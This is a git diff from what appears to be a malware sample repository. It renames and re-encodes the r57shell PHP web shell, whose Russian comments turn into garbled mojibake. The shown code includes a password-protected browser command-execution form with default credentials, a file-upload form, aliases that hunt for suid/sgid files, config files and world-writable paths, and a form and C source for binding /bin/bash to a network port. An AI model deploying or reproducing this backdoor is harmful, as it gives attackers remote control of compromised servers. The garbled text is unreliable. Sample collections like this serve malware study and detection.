diff --git a/PHP/Backdoor.PHP.Rst.am b/PHP/Backdoor.PHP.R57.a similarity index 74% rename from PHP/Backdoor.PHP.Rst.am rename to PHP/Backdoor.PHP.R57.a index 00df653fc61dbecc11b4764818cd7972e9dbb767..8f1e728ce50826cf29c2b7cac8dca411ee70c322 100644 --- a/PHP/Backdoor.PHP.Rst.am +++ b/PHP/Backdoor.PHP.R57.a @@ -10,33 +10,33 @@ /* /* SPECIAL xbIx birthday edition /* -/* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер -/* Вы можете скачать новую версию на нашем сайте: http://rst.void.ru или www.rsteam.ru -/* Версия 1.0 beta (писалась практически на коленке... так что код сыроват... для тестирования) +/* r57shell.php - ñêðèïò Гà ïõï ïîçâîëÿþùèé ГўГ Г¬ âûïîëГГїГІГј øåëë êîìà Гäû Гà ñåðâåðå ÷åðåç áðà óçåð +/* Âû ìîæåòå Г±ГЄГ Г·Г ГІГј Гîâóþ âåðñèþ ГГ ГГ ГёГҐГ¬ ñà éòå: http://rst.void.ru èëè www.rsteam.ru +/* Âåðñèÿ 1.0 beta (ïèñà ëà ñü ïðà êòè÷åñêè Гà êîëåГГЄГҐ... ГІГ ГЄ Г·ГІГ® êîä ñûðîâà ò... äëÿ òåñòèðîâà ГГЁГї) /* -/* Возможности: -/* ~ защита скрипта с помощью пароля -/* ~ выполнение шелл-команд -/* ~ загрузка файлов на сервер -/* ~ поддерживает алиасы команд -/* ~ включены 4 алиаса команд: -/* - поиск на сервере всех файлов с suid битом -/* - поиск на сервере всех файлов с sgid битом -/* - поиск на сервере файлов config.inc.php -/* - поиск на сервере всех директорий и файлов доступных на запись для всех -/* ~ два языка интерфейса: русский, английский -/* ~ возможность забиндить /bin/bash на определенный порт +/* ÂîçìîæГîñòè: +/* ~ çà ùèòà ñêðèïòà ñ ïîìîùüþ ïà ðîëÿ +/* ~ âûïîëГГҐГГЁГҐ øåëë-êîìà ГГ¤ +/* ~ çà ãðóçêà ôà éëîâ Гà ñåðâåð +/* ~ ïîääåðæèâà åò à ëèà ñû êîìà ГГ¤ +/* ~ âêëþ÷åГГ» 4 à ëèà ñà êîìà ГГ¤: +/* - ïîèñê Гà ñåðâåðå ГўГ±ГҐГµ ôà éëîâ Г± suid áèòîì +/* - ïîèñê Гà ñåðâåðå ГўГ±ГҐГµ ôà éëîâ Г± sgid áèòîì +/* - ïîèñê Гà ñåðâåðå ôà éëîâ config.inc.php +/* - ïîèñê Гà ñåðâåðå ГўГ±ГҐГµ äèðåêòîðèé ГЁ ôà éëîâ äîñòóïГûõ Гà çà ïèñü äëÿ ГўГ±ГҐГµ +/* ~ äâà ÿçûêà èГòåðôåéñà : ðóññêèé, Г Гãëèéñêèé +/* ~ âîçìîæГîñòü çà áèГäèòü /bin/bash Гà îïðåäåëåГГûé ïîðò /* /* 05.03.2004 (c) RusH security team /* /******************************************************************************************************/ -## Аутентификация +## ГЂГіГІГҐГòèôèêà öèÿ -## Логин и пароль для доступа к скрипту -## НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!! -$name="r57"; ## логин пользователя -$pass="r57"; ## пароль пользователя +## Ëîãèà è ïà ðîëü äëÿ äîñòóïà ê ñêðèïòó +## ГЌГ… ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ГЏГ…ГђГ…Г„ ÐÀÇÌÅÙÅÍÈÅÌ ГЌГЂ ÑÅÐÂÅÐÅ!!! +$name="r57"; ## ëîãèà ïîëüçîâà òåëÿ +$pass="r57"; ## ïà ðîëü ïîëüçîâà òåëÿ if(!isset($PHP_AUTH_USER)) { @@ -59,28 +59,28 @@ set_time_limit(0); /* -Выбор языка -$language='ru' - русский -$language='eng' - английский +Âûáîð ÿçûêà +$language='ru' - ðóññêèé +$language='eng' - Г Гãëèéñêèé */ $language='ru'; $lang=array( - 'ru_text1' => 'Выполненная команда', - 'ru_text2' => 'Выполнение команд на сервере', - 'ru_text3' => 'Выполнить команду', - 'ru_text4' => 'Рабочая директория', - 'ru_text5' => 'Загрузка файлов на сервер', - 'ru_text6' => 'Локальный файл', - 'ru_text7' => 'Алиасы', - 'ru_text8' => 'Выберите алиас', - 'ru_butt1' => 'Выполнить', - 'ru_butt2' => 'Загрузить', - 'ru_text9' => 'Открытие порта и привязка его к /bin/bash', - 'ru_text10' => 'Открыть порт', - 'ru_text11' => 'Пароль для доступа', - 'ru_butt3' => 'Открыть', + 'ru_text1' => 'ÂûïîëГГҐГГГ Гї êîìà Гäà ', + 'ru_text2' => 'ÂûïîëГГҐГГЁГҐ êîìà ГГ¤ Гà ñåðâåðå', + 'ru_text3' => 'ÂûïîëГГЁГІГј êîìà Гäó', + 'ru_text4' => 'Ðà áî÷à ÿ äèðåêòîðèÿ', + 'ru_text5' => 'Çà ãðóçêà ôà éëîâ Гà ñåðâåð', + 'ru_text6' => 'Ëîêà ëüГûé ôà éë', + 'ru_text7' => 'Àëèà ñû', + 'ru_text8' => 'Âûáåðèòå à ëèà ñ', + 'ru_butt1' => 'ÂûïîëГГЁГІГј', + 'ru_butt2' => 'Çà ãðóçèòü', + 'ru_text9' => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ГЄ /bin/bash', + 'ru_text10' => 'Îòêðûòü ïîðò', + 'ru_text11' => 'Ïà ðîëü äëÿ äîñòóïà ', + 'ru_butt3' => 'Îòêðûòü', 'eng_text1' => 'Executed command', 'eng_text2' => 'Execute command on server', @@ -101,22 +101,22 @@ $lang=array( /* -Алиасы команд -Позволяют избежать многократного набора одних и тех-же команд. ( Сделано благодаря моей природной лени ) -Вы можете сами добавлять или изменять команды. +Àëèà ñû êîìà ГГ¤ +Ïîçâîëÿþò èçáåæà òü Г¬Гîãîêðà òГîãî Гà áîðà îäГГЁГµ ГЁ ГІГҐГµ-æå êîìà ГГ¤. ( Ñäåëà ГГ® áëà ãîäà ðÿ ìîåé ïðèðîäГîé ëåГГЁ ) +Âû ìîæåòå ñà ìè äîáà âëÿòü èëè èçìåГГїГІГј êîìà Гäû. */ $aliases=array( -/* поиск на сервере всех файлов с suid битом */ +/* ïîèñê Гà ñåðâåðå ГўГ±ГҐГµ ôà éëîâ Г± suid áèòîì */ 'find all suid files' => 'find / -type f -perm -04000 -ls', -/* поиск на сервере всех файлов с sgid битом */ +/* ïîèñê Гà ñåðâåðå ГўГ±ГҐГµ ôà éëîâ Г± sgid áèòîì */ 'find all sgid files' => 'find / -type f -perm -02000 -ls', -/* поиск на сервере файлов config.inc.php */ +/* ïîèñê Гà ñåðâåðå ôà éëîâ config.inc.php */ 'find config.inc.php files' => 'find / -type f -name config.inc.php', -/* поиск на сервере всех директорий и файлов доступных на запись для всех */ +/* ïîèñê Гà ñåðâåðå ГўГ±ГҐГµ äèðåêòîðèé ГЁ ôà éëîâ äîñòóïГûõ Гà çà ïèñü äëÿ ГўГ±ГҐГµ */ 'find writable directories and files' => 'find / -perm -2 -ls', '----------------------------------------------------------------------------------------------------' => 'ls -la' ); @@ -137,7 +137,7 @@ int sockfd, newfd; char buf[30]; struct sockaddr_in remote; if(argc < 3) usage(argv[0]); -if(fork() == 0) { // Ответвляем новый процесс +if(fork() == 0) { // Îòâåòâëÿåì Гîâûé ïðîöåññ remote.sin_family = AF_INET; remote.sin_port = htons(atoi(argv[1])); remote.sin_addr.s_addr = htonl(INADDR_ANY); @@ -178,7 +178,7 @@ return 0; }"; ?> -<!-- Здравствуй Вася --> +<!-- Çäðà âñòâóé Âà ñÿ --> <html> <head> <title>r57shell</title> @@ -322,9 +322,9 @@ echo "</b>"; /* command execute form */ echo "<form name=command method=post>"; echo "<font face=Verdana size=-2>"; -echo "<b> ".$lang[$language._text3]." <font face=Wingdings color=gray>и</font> </b>"; +echo "<b> ".$lang[$language._text3]." <font face=Wingdings color=gray>ГЁ</font> </b>"; echo "<input type=text name=cmd size=85> <br>"; -echo "<b> ".$lang[$language._text4]." <font face=Wingdings color=gray>и</font> </b>"; +echo "<b> ".$lang[$language._text4]." <font face=Wingdings color=gray>ГЁ</font> </b>"; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; } else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; } echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">"; @@ -339,7 +339,7 @@ echo "</form>"; /* file upload form */ echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; echo "<font face=Verdana size=-2>"; -echo "<b> ".$lang[$language._text6]." <font face=Wingdings color=gray>и</font> </b>"; +echo "<b> ".$lang[$language._text6]." <font face=Wingdings color=gray>ГЁ</font> </b>"; echo "<input type=file name=userfile size=85> "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; } else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; } @@ -355,7 +355,7 @@ echo "</form>"; /* aliases form */ echo "<form name=aliases method=POST>"; echo "<font face=Verdana size=-2>"; -echo "<b> ".$lang[$language._text8]." <font face=Wingdings color=gray>и</font> </b>"; +echo "<b> ".$lang[$language._text8]." <font face=Wingdings color=gray>ГЁ</font> </b>"; echo "<select name=alias>"; foreach ($aliases as $alias_name=>$alias_cmd) { @@ -378,9 +378,9 @@ echo "</form>"; /* port bind form */ echo "<form name=bind method=POST>"; echo "<font face=Verdana size=-2>"; -echo "<b> ".$lang[$language._text10]." <font face=Wingdings color=gray>и</font> </b>"; +echo "<b> ".$lang[$language._text10]." <font face=Wingdings color=gray>ГЁ</font> </b>"; echo "<input type=text name=port size=15 value=11457> "; -echo "<b> ".$lang[$language._text11]." <font face=Wingdings color=gray>и</font> </b>"; +echo "<b> ".$lang[$language._text11]." <font face=Wingdings color=gray>ГЁ</font> </b>"; echo "<input type=text name=bind_pass size=15 value=r57> "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; } else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }